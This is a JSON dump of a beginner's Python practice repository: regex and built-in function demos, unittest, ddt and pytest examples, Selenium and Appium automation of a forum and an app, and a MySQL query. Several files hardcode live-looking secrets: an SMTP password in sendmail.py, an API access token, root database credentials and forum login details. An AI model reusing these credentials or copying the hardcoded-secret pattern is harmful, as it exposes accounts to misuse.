自己直接返回匹配的值\nm = re.findall('[a-zA-Z]{1,10}', '75ab9cf') # 匹配所有字母\nm = re.findall('.*', '75ab9cf') # 匹配所有\nm = re.findall('.+', '75ab9cf') # 匹配一个不包含0\nm = re.findall('[a-zA-Z]+', '75a.b_9cf') # 匹配字母\nm = re.findall('~', '75a. b_9cf')\nm = re.search('\\d+$', 'ss75a. b_9cf') #整个查找 全部数字\n#m= re.sub('^\\d+','|','ss75a. b_9c1f',count=2) #替换两个\n\nif m:\n print(m)\n #m.\n" }, { "alpha_fraction": 0.5744680762290955, "alphanum_fraction": 0.5957446694374084, "avg_line_length": 17, "blob_id": "d658fa6761bf158c466ac2b4c5d10d806e3abbfd", "content_id": "03cffb96e0e2b9fc059f8c459c640ae0d5d548e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 239, "license_type": "no_license", "max_line_length": 41, "num_lines": 13, "path": "/src/beautiful_report/testcase/test_data.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import unittest\nfrom ddt import ddt,data,file_data,unpack\n\n\n@ddt\nclass myddt(unittest.TestCase):\n '''测试ddt'''\n @data([2,3],[4,5])\n def test_a(self,value):\n print(value[1])\n\nif __name__=='__main__':\n unittest.main()\n\n" }, { "alpha_fraction": 0.6521739363670349, "alphanum_fraction": 0.6555184125900269, "avg_line_length": 24, "blob_id": "e054231dd966df54f6058b9117026d8a37fca56c", "content_id": "6874311acae2488664553d022a1c9093003f14e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 307, "license_type": "no_license", "max_line_length": 61, "num_lines": 12, "path": "/src/beautiful_report/testcase/test13.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nimport unittest\n\ndriver = webdriver.Chrome()\nclass NameTestCase(unittest.TestCase): # 测试用例\n def test1(self):\n driver.get('https://www.baidu.com/')\n assert driver.current_url == 'https://www.baidu.com/'\n\n\nif __name__ == '__main__':\n unittest.main()" }, { "alpha_fraction": 0.5328466892242432, "alphanum_fraction": 0.5328466892242432, "avg_line_length": 18.571428298950195, "blob_id": "b89867e43c6e08aeacf1acf4044797c53e459574", "content_id": "0b0714a3c110d89a94666c5b333539b5e348d30c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 306, "license_type": "no_license", "max_line_length": 74, "num_lines": 14, "path": "/src/0728_sundry/__init__.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "name = input(\"name: \")\nage = input(\"age: \")\njob = input(\"job: \")\n\nprint('Name:' + name + '\\nage' + age + '\\njob' + job)\nprint('Name:%s\\nAge:%s\\nJob:%s' % (name, age, job)) # 只占用一次内存,中文: %s %()\n\nmessage = '''\nname:%s\nage:%s\njob:%s\n''' % (name, age, job)\n#段落\nprint(message)\n" }, { "alpha_fraction": 0.6080626845359802, "alphanum_fraction": 0.6416573524475098, "avg_line_length": 29.79310417175293, "blob_id": "1859bdfe6de851480adb6a16e33c009006967d42", "content_id": "55f344ee650456ed1275140e6f85a5ea002ca9ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 949, "license_type": "no_license", "max_line_length": 81, "num_lines": 29, "path": "/src/pytest_v/bussiness/user.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium.webdriver import ActionChains\n\nfrom singdriver import Singdriver\n\nclass UserAction:\n\n '''\n 业务相关操作\n '''\n\n def __init__(self):\n self.driver = Singdriver()\n\n def user_login(self):\n self.driver.get('http://39.107.96.138:3000/signin')\n self.driver.find_element_by_css_selector('#name').send_keys(\"testuser1\")\n self.driver.find_element_by_css_selector('#pass').send_keys('123456')\n self.driver.find_element_by_css_selector('input[value=\"登录\"]').click()\n\n def user_send(self):\n self.user_login()\n self.driver.get('http://39.107.96.138:3000/topic/create')\n\n edit = self.driver.find_element_by_css_selector('div.CodeMirror-scroll')\n edit.click()\n # 定义多个动作 并执行 注意:一定要在最后调用perform()\n\n action = ActionChains(self.driver)\n action.move_to_element(edit).send_keys(\"helloworld\").perform()\n" }, { "alpha_fraction": 0.5025510191917419, "alphanum_fraction": 0.5229591727256775, "avg_line_length": 22.117647171020508, "blob_id": "c6b27b0a9a383811116c4ed0c5f2c7401878eba3", "content_id": "456de26cf3b52c4809ee766a9ae4c83c153892a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 392, "license_type": "no_license", "max_line_length": 48, "num_lines": 17, "path": "/src/Unit2/test.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "fo = open('Employee.txt', 'r', encoding=\"utf-8\")\nlines = fo.readlines()\nfo.close()\niempdata = list()\nfor line in lines[1:]:\n line = line.split()\n info_emp = {\n 'emp_id': line[0],\n 'emp_name': line[1],\n 'emp_birth': line[2],\n 'emp_edu': line[3],\n 'emp_sex': line[4],\n 'emp_kpi': int(line[5])\n }\n iempdata.append(info_emp)\n\nprint( iempdata)" }, { "alpha_fraction": 0.5109127163887024, "alphanum_fraction": 0.5932539701461792, "avg_line_length": 22.44186019897461, "blob_id": "9fdf5d72291de23e205ccb55a8e939f35518c819", "content_id": "9b709331e679ba7f5dce67f5a5fe84aae8ee375d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1308, "license_type": "no_license", "max_line_length": 73, "num_lines": 43, "path": "/src/learn/day3_3内置函数.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "print(abs(-99.9)) # 绝对值\nprint(all([1, 2, 3, ''])) # 所有必须不为空,才真\nprint(any([1, 2, 3, '', None])) # 有一个真则为真\nprint(ascii(8)) # 自动执行__repr__方法\nprint(bin(10)) # 转换二进制\nprint(bool(None)) # 布尔 返回false\nprint(bytearray('五五', encoding='utf-8')) # 转成字节数组\nprint(bytes('五五', encoding='utf-8')) # 转成字符串\nprint(callable(lambda x: x + 1)) # 是否可以执行\nprint(chr(99)) # 将数字码转换成字符\nprint(ord('c')) # 将字符转换成数字 :验证码\nprint(divmod(5, 2)) # 商和余数\nfor i in enumerate(['alex', 'eric'], 3):\n print(i) # 加上序列\nprint(eval('6*8')) # 字符串两个数相乘6*8\nli = [11, 22, 33, 44]\nprint(list(map(lambda x: x + 100, li))) # map循环调用lambda x: x + 100或者调用方法\n\n\ndef func(x):\n if x > 33:\n return True\n else:\n return False\n\n\nprint(list(filter(func, li))) # 根据True条件返回值,过滤\n''''\nformat()# 类似形参,传参数\nfloat()#浮点\nfrozenset()#不能修改的set\nhex(100) #16进制\noct()#8进制\nrange(0,10) #区间\nround(9.8) #四舍五入\nmax(11,22,33) # 最大\nmin(11,22,33) #最小\nsum(11,22)#求和\nsuper #子类用父类\n'''''\nx = [11, 22, 33, 44]\ny = [22, 33, 44, 55]\nprint(list(zip(x, y))) # xy相拼\n" }, { "alpha_fraction": 0.5934426188468933, "alphanum_fraction": 0.5967212915420532, "avg_line_length": 19.399999618530273, "blob_id": "f3904dbd7535227df622630e8e905fd602ce5395", "content_id": "56a851cb5560d0ef3028c5bd7db0b73975ab8681", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 323, "license_type": "no_license", "max_line_length": 57, "num_lines": 15, "path": "/src/beautiful_report/page/topic_page.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from page import Page\nfrom selenium.webdriver.common.by import By\n\n\nclass topic_page(Page):\n '''\n 发帖页面\n '''\n\n url = '/api/v1/topics'\n\n # 定位器\n # username = (By.CSS_SELECTOR, '#name')\n # password = (By.CSS_SELECTOR, '#pass')\n # submit_loc = (By.CSS_SELECTOR, 'input[value=\"登录\"]')" }, { "alpha_fraction": 0.5911329984664917, "alphanum_fraction": 0.6059113144874573, "avg_line_length": 19.399999618530273, "blob_id": "9e22cb167a37b8f1f87018271d6cdf1ed0400d08", "content_id": "0bf99b5ac20003ea5a8ee3f107e40145b1d83cea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 231, "license_type": "no_license", "max_line_length": 46, "num_lines": 10, "path": "/src/beautiful_report/testcase/test12.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import unittest\n\n\nclass NameTestCase(unittest.TestCase): # 测试用例\n \"\"\"测试name_function\"\"\"\n\n\n def test_first_last_name1(self):\n \"\"\"能否正确处理janis Joplin\"\"\"\n self.assertEqual('22', 'Janis Joplin') # 断言" }, { "alpha_fraction": 0.5426356792449951, "alphanum_fraction": 0.5674418807029724, "avg_line_length": 22.035715103149414, "blob_id": "c76056646f3d6815288a575951685add1a3ab9c3", "content_id": "9327597a5ad3f2c39d5e166d21b9697ca61a57b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 669, "license_type": "no_license", "max_line_length": 68, "num_lines": 28, "path": "/src/beautiful_report/page/page.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\n\nclass Page:\n '''\n 基础页面类\n '''\n\n login_url = 'http://39.107.96.138:3000'\n\n def __init__(self, seleium_driver, base_url=login_url):\n self.driver = seleium_driver\n self.base_url = base_url\n # 设置超时时间30秒\n self.timeout = 30\n\n def on_page(self):\n return self.driver.current_url == (self.base_url + self.url)\n\n def _open(self, url):\n url = self.base_url + url\n self.driver.get(url)\n assert self.on_page(), 'Did not land on %s' % url\n\n def open(self):\n self._open(self.url)\n\n def get_url(self):\n return self.base_url + self.url\n" }, { "alpha_fraction": 0.4745417535305023, "alphanum_fraction": 0.5173116326332092, "avg_line_length": 40, "blob_id": "9e732b16ceb536e66c937ee3036e25add0e02e1c", "content_id": "e40d76274cbae6aaa6c7273ac9dbb109b06d6a43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 563, "license_type": "no_license", "max_line_length": 77, "num_lines": 12, "path": "/src/learn/sql.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import pymysql\n\nconnect = pymysql.Connect(host=\"192.168.0.105\", #host=\"localhost\" \"127.0.0.1\"\n port=3306, #端口号\n user=\"root\", #用户名\n passwd=\"root\", #密码\n db=\"test\", #数据库\n charset='utf8')\ncursor = connect.cursor() #定义一个游标,用来执行sql语句\ncursor.execute(\"select * from test\")\nresult = cursor.fetchall() ## fetchone 获取一条 fetchmany 获取多条 fetchall 获取所有\nprint(result)" }, { "alpha_fraction": 0.4730878174304962, "alphanum_fraction": 0.5155807137489319, "avg_line_length": 19.764705657958984, "blob_id": "60389e31d461c09313ae4a1b1997ca90b90d9361", "content_id": "73b4069297b015adccb83618fce18c7c5c66bc13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 407, "license_type": "no_license", "max_line_length": 61, "num_lines": 17, "path": "/src/pytest_v/testcase/test_param.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import pytest\n\ndata = [('1', '2', '3'), ('2', '2', '3'), ('3', '2', '3')]\n\n\[email protected](params=data, ids=['tab1', 'tab2', 'tab3'])\ndef func(request):\n '''\n 数据传参的时候 主要是作为 不同数据的不同解释\n :param request: params作为数据驱动\n :return:\n '''\n return request.param\n\n\ndef test_01(func):\n print(f'=========={func}====={type(func)}====={func[0]}')\n" }, { "alpha_fraction": 0.5785440802574158, "alphanum_fraction": 0.5785440802574158, "avg_line_length": 14.352941513061523, "blob_id": "334ccfff94b7c722777b9c0e218541526e5ef2cd", "content_id": "ea5b408fe2cfb021ce6b420b8930db903b4cf3f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 269, "license_type": "no_license", "max_line_length": 43, "num_lines": 17, "path": "/src/beautiful_report/business/login.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from login_page import LoginPage\nfrom singdriver import Singdriver\n\n\nclass user:\n '''\n 注册登陆\n '''\n\n def login(self):\n loginpage = LoginPage(Singdriver())\n loginpage.open()\n\n\nif __name__ == '__main__':\n user = user()\n user.login()\n" }, { "alpha_fraction": 0.538922131061554, "alphanum_fraction": 0.5638722777366638, "avg_line_length": 25.36842155456543, "blob_id": "fb111d61ac783ca0491e9ffe30306975ddb1ae53", "content_id": "588c7790f3ae9780d6b524f907c13506c65ef431", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1110, "license_type": "no_license", "max_line_length": 80, "num_lines": 38, "path": "/src/learn/sendmail.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import email.mime.text\nimport email.utils\n\n\nimport smtplib\nfrom email.mime.text import MIMEText\n\n\nself_user = '[email protected]'\ndef mail(self_user):\n ret = True\n try:\n\n sender = '[email protected]' # 发件人邮箱(最好写全, 不然会失败)\n receivers = ['[email protected]'] # 接收邮件,可设置为你的QQ邮箱或者其他邮箱\n\n msg = MIMEText('邮件内容', 'plain', 'utf-8')\n msg['From'] = \"{}\".format(sender)\n msg['To'] = \",\".join(receivers)\n msg['Subject'] = '主题'\n\n # server = smtplib.SMTP_SSL('applesmtp.163.com', 465)\n # server.connect('applesmtp.163.com', 25)\n # server.login('[email protected]', 'Qzxcvb50')\n # server.sendmail(msg['From'],msg['To'] , msg.as_string())\n\n server = smtplib.SMTP_SSL('applesmtp.163.com', 465) # 启用SSL发信, 端口一般是465\n server.login('[email protected]', 'Qzxcvb50') # 登录验证\n server.sendmail('[email protected]', [self_user], msg.as_string()) # 发送\n\n server.quit()\n except Exception:\n ret = False\n return ret\n\n\nif __name__ == '__main__':\n print(mail('[email protected]'))\n" }, { "alpha_fraction": 0.6248455047607422, "alphanum_fraction": 0.6266996264457703, "avg_line_length": 30.115385055541992, "blob_id": "26bd62813b4b10a4fd79ff98f05340f5b1bf62bb", "content_id": "6c3c064987d06ed7ab5d07db112031c575ef77c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1740, "license_type": "no_license", "max_line_length": 76, "num_lines": 52, "path": "/src/testcase/test_name_function.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import unittest\n\nfrom testcase.name_function import get_formatted_name, AnoymoisSurey\n\n\nclass NameTestCase(unittest.TestCase): # 测试用例\n \"\"\"测试name_function\"\"\"\n\n def test_first_last_name1(self):\n \"\"\"能否正确处理janis Joplin\"\"\"\n formatted_name = get_formatted_name('janis', 'Joplin')\n self.assertEqual(formatted_name, 'Janis Joplin') # 断言\n\n def test_first_last_middle_name(self):\n \"\"\"能否正确处理像Wolfgang Amadeus Mozart\"\"\"\n formatted_name = get_formatted_name('Wolfgang', 'Mozart', 'Amadeus')\n self.assertEqual(formatted_name, 'Wolfgang Amadeus Mozart')\n\n\nclass AnoymoisSureyTestCase(unittest.TestCase):\n \"\"\"针对AnoymoisSurey测试\"\"\"\n\n def test_response(self):\n \"\"\"测试答案是否存储\"\"\"\n question = \"What are you learn?\"\n my_survey = AnoymoisSurey(question)\n responses = ['English', 'Chinese'] # 存储多个答案\n for response in responses:\n my_survey.store_response(response)\n for response in responses:\n self.assertIn(response, my_survey.responses)\n\n def setUp(self):\n question = \"What are you learn?\"\n self.my_survey = AnoymoisSurey(question)\n self.responses = ['English', 'Chinese'] # 存储多个答案\n\n def test_store_sigle(self):\n \"\"\"测试单个答案\"\"\"\n self.my_survey.store_response(self.responses[0])\n self.assertIn(self.responses[0], self.my_survey.responses)\n\n def test_two_sigle(self):\n \"\"\"测试三个是否正常存储\"\"\"\n\n for response in self.responses:\n self.my_survey.store_response(response)\n for response in self.responses:\n self.assertIn(response, self.my_survey.responses)\n\n\nunittest.main()\n" }, { "alpha_fraction": 0.5263158082962036, "alphanum_fraction": 0.5526315569877625, "avg_line_length": 13.538461685180664, "blob_id": "dadcc57e36a8cc189899c99d4d84e052c26c1a2c", "content_id": "698ca3b09f3290b684d0dad9fe3b1540b89d0d2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 190, "license_type": "no_license", "max_line_length": 31, "num_lines": 13, "path": "/src/beautiful_report/API_test/test1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import ddt\nimport unittest\n\[email protected]\nclass test1(unittest.TestCase):\n datali=[\n {1,2},\n {2,3}\n ]\n\n @ddt.data(*datali)\n def testa(self,value):\n print(value)\n\n" }, { "alpha_fraction": 0.4662731885910034, "alphanum_fraction": 0.47892072796821594, "avg_line_length": 27.926828384399414, "blob_id": "a6754c4981c7ef8911a5b4c2a201fc289c79eb06", "content_id": "c529b7f775f5b65557a3ce3497241c6dbf9eabe7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1202, "license_type": "no_license", "max_line_length": 71, "num_lines": 41, "path": "/src/Unit2/__init__.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "class Employee():\n def __init__(self, emp_id, emp_name, emp_edu='本科'):\n self.emp_id = emp_id\n self.emp_name = emp_name\n self.emp_edu = emp_edu\n\n file = 'Employee.txt'\n iempdata = list()\n def readfile(self):\n fo = open(self.file, 'r', encoding=\"utf-8\")\n lines = fo.readlines()\n fo.close()\n if len(lines) < 2:\n return []\n for line in lines[1:]:\n line = line.split('\\t')\n info_emp = {\n 'emp_id': line[0],\n 'emp_name': line[1],\n 'emp_birth': line[2],\n 'emp_edu': line[3],\n 'emp_sex': line[4],\n 'emp_kpi': int(line[5])\n }\n self.iempdata.append(info_emp)\n return self.iempdata\n def _getNewId(self):\n \"\"\"获取最大员工id+1\"\"\"\n if len(self.iempdata) != 0:\n dempDataRow = max(self.iempdata, key=lambda x: x['emp_id'])\n print(dempDataRow)\n iNewid = int(dempDataRow['emp_id'])+1\n else:\n iNewid =1\n return iNewid\n\n\n\nmy_employee = Employee('eu','23')\nprint(my_employee.readfile())\nprint(my_employee._getNewId())\n" }, { "alpha_fraction": 0.6495237946510315, "alphanum_fraction": 0.6828571557998657, "avg_line_length": 42.70833206176758, "blob_id": "7b4cc6245b79c44228b856c853d6d22b1fa94cf1", "content_id": "6ce5a899697934b4b6db108687019643612d60d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1076, "license_type": "no_license", "max_line_length": 96, "num_lines": 24, "path": "/src/appium_test/test1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from appium import webdriver\nimport time\n\ndesired_caps = {}\ndesired_caps['platformName'] = 'Android' #平台名称\ndesired_caps['deviceName'] = '192.168.0.105:5555' #建立连接\n#desired_caps['deviceName'] = 'Coolpad 5263S' #机器名\n#desired_caps['udid'] = '2b435cfe' #真机\n\n\n# desired_caps['app'] = r'D:\\kaoyan3.1.0.apk'\n# desired_caps['appPackage'] = 'com.tal.kaoyan'\n# desired_caps['appActivity'] = 'com.tal.kaoyan.ui.activity.SplashActivity'\n#\n# driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)\n#\n# driver.implicitly_wait('10')\n# driver.find_element_by_id('android:id/button2').click()\n# driver.find_element_by_id('com.tal.kaoyan:id/tv_skip').click()\n# driver.find_element_by_id('com.tal.kaoyan:id/login_email_edittext').send_keys('122112112')\n# driver.find_element_by_id('com.tal.kaoyan:id/login_password_edittext').send_keys('111111111')\n# time.sleep(10)\n# driver.find_element_by_id('com.tal.kaoyan:id/login_scan_btn').click()\ndriver.find_element_by_id('com.ss.android.ugc.aweme:id/a_8').click()\n\n" }, { "alpha_fraction": 0.4872824549674988, "alphanum_fraction": 0.5006693601608276, "avg_line_length": 12.600000381469727, "blob_id": "c50e42e7b94cde372c4716799ebfcbb0af3a38fc", "content_id": "9f25a60df13336dd368628423fbb61311656e579", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 883, "license_type": "no_license", "max_line_length": 38, "num_lines": 55, "path": "/src/pytest_v/testcase/temp.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import pytest\n'''\n函数级别进行测试用例先后执行\n'''\[email protected]()\ndef func(func2,func3):\n '''\n 单个测试用例执行前\n :return:\n '''\n print('----func set up---')\n yield\n '''\n 单个测试用例执行后\n '''\n print('teardown')\n\[email protected](scope='module')\ndef func2():\n '''\n 单个测试用例执行前\n :return:\n '''\n print('----func set up moudle---')\n yield\n '''\n 单个测试用例执行后\n '''\n print('teardown')\n\[email protected](scope='class')\ndef func3():\n '''\n 单个测试用例执行前\n :return:\n '''\n print('----func set up class---')\n yield\n '''\n 单个测试用例执行后\n '''\n print('teardown class')\n\n\n\n\ndef test_01():\n print('tttt')\n\ndef test02():\n print('ssss')\n\nclass TestTemp2:\n def test1(self,func):\n print('----------------')" }, { "alpha_fraction": 0.6020408272743225, "alphanum_fraction": 0.6020408272743225, "avg_line_length": 18.600000381469727, "blob_id": "bda8684db49ee6100a9ccb36cc10f6f38de7b154", "content_id": "8591cbb43b7cf069772522cd8c82805e05509c5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 312, "license_type": "no_license", "max_line_length": 55, "num_lines": 15, "path": "/src/beautiful_report/page/login_page.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from page import Page\nfrom selenium.webdriver.common.by import By\n\n\nclass LoginPage(Page):\n '''\n 登陆页面\n '''\n\n url = '/signin'\n\n # 定位器\n username = (By.CSS_SELECTOR, '#name')\n password = (By.CSS_SELECTOR, '#pass')\n submit_loc = (By.CSS_SELECTOR, 'input[value=\"登录\"]')\n" }, { "alpha_fraction": 0.47287341952323914, "alphanum_fraction": 0.48425987362861633, "avg_line_length": 23.04838752746582, "blob_id": "efe798f3b868ee3037258dea4d885bdfdc3e5b84", "content_id": "15199150f3a032770e03e4636765d9c9665cbe91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1673, "license_type": "no_license", "max_line_length": 59, "num_lines": 62, "path": "/src/work/day1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "\"\"\"\"作业:编写登陆接口\"\"\"\n\n\"\"\"输入用户名密码\n认证成功后显示欢迎信息\n输错三次后锁定\"\"\"\n\n\"\"\"3级菜单\"\"\"\n\n\n# # 1、用户信息文件 2、黑名单文件\n# class main():\n# with open('blackname.txt') as file_object:\n# blackname = file_object.read()\n# print(blackname)\n# with open('whitename.txt') as file_object1:\n# whitenam = file_object1.read()\n# print(whitenam)\n\n\ndef main():\n count = 0\n while count < 3:\n name = input(\"用户名: \")\n with open('blackname.txt', 'r') as file_object:\n lines = file_object.readlines()\n blackname2(lines, name)\n if len(name) == 0:\n print('密码不能为空')\n continue\n\n password = input('密码: ')\n with open('whitename.txt', 'r') as file_object:\n flag = False\n for line in file_object.readlines():\n user, password1 = line.strip().split()\n if name == user and password == password1:\n print('success!')\n flag = True\n break\n if flag == False:\n if count < 2:\n print('用户名或密码错误')\n count += 1\n else:\n print('成功')\n\n\ndef blackname1(lines, name):\n for line in lines:\n if name == line.strip():\n print('用户 %s 已经被锁定' % name)\n\n\ndef blackname2(lines, name):\n line1 = []\n for line in lines:\n line1.append(line)\n if name in line1:\n print('用户 %s 已经被锁定,退出' % name)\n\nif __name__ == '__main__':\n main()\n\n\n" }, { "alpha_fraction": 0.6801228523254395, "alphanum_fraction": 0.7073277831077576, "avg_line_length": 27.13580322265625, "blob_id": "541985b3e2bbfdeb1ca81ec4bdf69a726ba10193", "content_id": "4475cdd74355ad44de36166af1084435c090960d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2469, "license_type": "no_license", "max_line_length": 98, "num_lines": 81, "path": "/src/test/test/work_login.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.common.keys import Keys\ndriver = webdriver.Chrome()\n\n\ndef delete():\n driver.get(\"http://39.107.96.138:3000/signin\")\n\n driver.find_element_by_id('name').send_keys(\"testuser1\")\n driver.find_element_by_id('pass').send_keys('123456')\n\n driver.find_element_by_css_selector('input[value=\"登录\"]').click()\n # 进入个人中心\n driver.find_element_by_css_selector('span[class=\"user_name\"]>a.dark').click()\n # 点击最近创建的第一个话题\n driver.find_element_by_css_selector('div.cell a[class=\"topic_title\"]').click()\n # 点击删除按钮\n driver.find_element_by_css_selector('i[title=\"删除\"]').click()\n\n # 切换alert\n alert = driver.switch_to.alert\n # 获取文本\n alert_text = alert.text\n print(alert_text)\n # 点击确定\n alert.accept()\n\n # 点击取消\n # alert.dismiss()\n\n\n\n'''加帖子'''\ndriver = webdriver.Chrome()\n\ndriver.get(\"http://39.107.96.138:3000/signin\")\n\n\ndriver.find_element_by_id('name').send_keys(\"testuser1\")\ndriver.find_element_by_id('pass').send_keys('123456')\n\ndriver.find_element_by_css_selector('input[value=\"登录\"]').click()\n\ndriver.get('http://39.107.96.138:3000/topic/create')\n\n\nedit = driver.find_element_by_css_selector('div.CodeMirror-scroll')\nedit.click()\n# 定义多个动作 并执行 注意:一定要在最后调用perform()\naction = ActionChains(driver)\naction.move_to_element(edit).send_keys(\"helloworld\").perform()\n# 模拟ctrl a\naction.key_down(Keys.CONTROL)\naction.send_keys('a')\naction.key_up(Keys.CONTROL)\n# 模拟ctrl b\naction.key_down(Keys.CONTROL)\naction.send_keys('b')\naction.key_up(Keys.CONTROL)\n\naction.perform()\n\n\n# driver.find_element_by_css_selector('[id=\"tab-value\"]').click()\n# driver.find_element_by_css_selector('option[value=\"job\"]').click()\n\n# 使用Select 类定位元素\n# Select(driver.find_element_by_css_selector('select[id=\"tab-value\"]')).select_by_index(1)\n# 通过value值\n# Select(driver.find_element_by_css_selector('select[id=\"tab-value\"]')).select_by_value(\"ask\")\n# 通过可见文本值来操作\n\n\n\nSelect(driver.find_element_by_css_selector('select[id=\"tab-value\"]')).select_by_visible_text(\"问答\")\n\ndriver.find_element_by_id('title').send_keys(\"123131231231231231\")\n\ndriver.find_element_by_css_selector('input[value=\"提交\"]').click()\n" }, { "alpha_fraction": 0.42181816697120667, "alphanum_fraction": 0.4490908980369568, "avg_line_length": 25.238094329833984, "blob_id": "96722da94a85bd764c28405eee03d823b35eb79c", "content_id": "bf7343ec4e8d345bdc9d9519f710948b3f1f596c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 632, "license_type": "no_license", "max_line_length": 51, "num_lines": 21, "path": "/src/learn/day3_open_file.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "with open('test.txt', 'r+', encoding='utf-8') as f:\n f.seek(1) # 指定当前指针位置\n print(f.tell()) # 按照字符 读取指针位置\n #print(f.read(4)) #读两个字节\n print(f.tell()) # 按照字符\n f.truncate()#截取当前位置,再保存当前文件\n\n\ndef two_question01():\n num = 0\n for i in range(1,5):\n for j in range(1,5):\n for id in range(1,5):\n if i!=j and i!=id and j!=id:\n li = [i, j, id]\n b = [str(n) for n in li]\n print(''.join(b))\n num+=1\n\n print(num)\ntwo_question01()" }, { "alpha_fraction": 0.634482741355896, "alphanum_fraction": 0.682758629322052, "avg_line_length": 17.25, "blob_id": "2637649b7ec7c353835413a31eb35b46ac3d023d", "content_id": "29abaa151dd91be990a7623baa2b01b26b97189e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "no_license", "max_line_length": 71, "num_lines": 8, "path": "/src/hanshu/test-diaoyong.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "'''\nCreated on 2019年7月13日\n\n@author: asus\n'''\nimport diaoyong \ncar = diaoyong.make_car('subaru', 'outback',color = 'black',tow='true')\nprint(car)" }, { "alpha_fraction": 0.49462366104125977, "alphanum_fraction": 0.5591397881507874, "avg_line_length": 27.615385055541992, "blob_id": "7d926447cb80f8dc25dc9c854850a0bef6350e09", "content_id": "441f60666e5631128702767b4f65026a78e1d9ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1116, "license_type": "no_license", "max_line_length": 107, "num_lines": 39, "path": "/src/test/test1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import requests\n\n\n# url1 = 'http://39.107.96.138:3000/api/v1{}'\n# url2 = '/topics'\n# url = url1.format(url2)\n# response = requests.get(url=url)\n# if response.status_code == 200:\n# print(response.text)\n# else:\n# print('error')\n\ndef result(type1, url2, params):\n url1 = 'http://39.107.96.138:3000/api/v1{}'\n url = url1.format(url2)\n print(url)\n if type1 == 'get':\n response = requests.get(url, params)\n if response.status_code == 200:\n # print(response.text)\n return response.json()\n else:\n print('error')\n return 'error'\n elif type1 == 'post':\n response = requests.post(url, data=params)\n if response.status_code == 200:\n # print(response.text)\n return response.json()\n else:\n #print(response.text)\n return 'error'\n\n\nif __name__ == '__main__':\n params = {'page': 1}\n print(result('get', '/topics', params))\n params = {'accessToken': 'c9715651-0d4a-4c50-af79-7fac08110e2a', 'title': 'test11', 'content': 'yyyyy'}\n print(result('post', '/topics', params))\n" }, { "alpha_fraction": 0.5643153786659241, "alphanum_fraction": 0.5933610200881958, "avg_line_length": 17.615385055541992, "blob_id": "fb4eb5b326c9f575a893c644165ec83522ed80c1", "content_id": "e75a1c00db1c75017809a84d4583d3ba36ebab53", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 265, "license_type": "no_license", "max_line_length": 35, "num_lines": 13, "path": "/src/hanshu/diaoyong.py", "repo_name": "qianpeng-qp/pytest1", 